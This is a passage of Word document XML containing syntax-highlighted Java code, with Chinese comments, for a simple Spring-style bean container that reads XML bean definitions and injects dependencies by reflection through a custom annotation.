        <w:t xml:space="preserve"> java.lang.reflect.Method;</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.net.URL;</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.util.ArrayList;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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.util.HashMap;</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.util.List;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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> java.util.Map;</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> org.apache.commons.beanutils.ConvertUtils;</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> org.dom4j.Document;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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> org.dom4j.Element;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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> org.dom4j.XPath;</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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> org.dom4j.io.SAXReader;</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> * Spring Bean Factory</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>class</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="445588"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> ClassPathXMLApplicationContext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private</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> List&lt;BeanDefinition&gt; beanDefines = </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> ArrayList&lt;BeanDefinition&gt;();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private</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> Map&lt;String, Object&gt; sigletons = </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> HashMap&lt;String, Object&gt;();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public</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> ClassPathXMLApplicationContext(String filename)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this</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.readXML(filename);</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this</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.instanceBeans();</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this</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.annotationInject();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this</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.injectObject();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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">   * </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>通过注解实现注入依赖对象</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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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private</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>void</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> annotationInject()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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (String beanName : sigletons.keySet()) { </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>循环所有的</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>Bean</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>对象</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Object bean = sigletons.get(beanName);</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bean != </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>)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try</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">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i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>查找属性的</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>setter</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>上是否有注解</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 xml:space="preserve">PropertyDescriptor[] ps = Introspector.getBeanInfo(bean.getClass()).getPropertyDescriptors();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for</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (PropertyDescriptor properdesc : ps) { </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>循环所有属性</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Method setter = properdesc.getWriteMethod();</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>获取属性的</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>setter</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>方法</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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (setter != </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; setter.isAnnotationPresent(MyResource.class)) { </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>判断</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>MyResource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>注解是否存在</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MyResource resource = setter.getAnnotation(MyResource.class);</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 xml:space="preserve">Object injectBean = </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs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if</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> (resource.name() != </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; !</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="DD1144"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>""</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="333333"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>.equals(resource.name()))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 xml:space="preserve">injectBean = sigletons.get(resource.name()); </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>MyResource</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>注解的</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="999988"/>
          <w:kern w:val="0"/>
          <w:sz w:val="16"/>
        </w:rPr>
        <w:t>name</w:t>
      </w:r>
      <w:r w:rsidRPr="00134F57">
        <w:rPr>
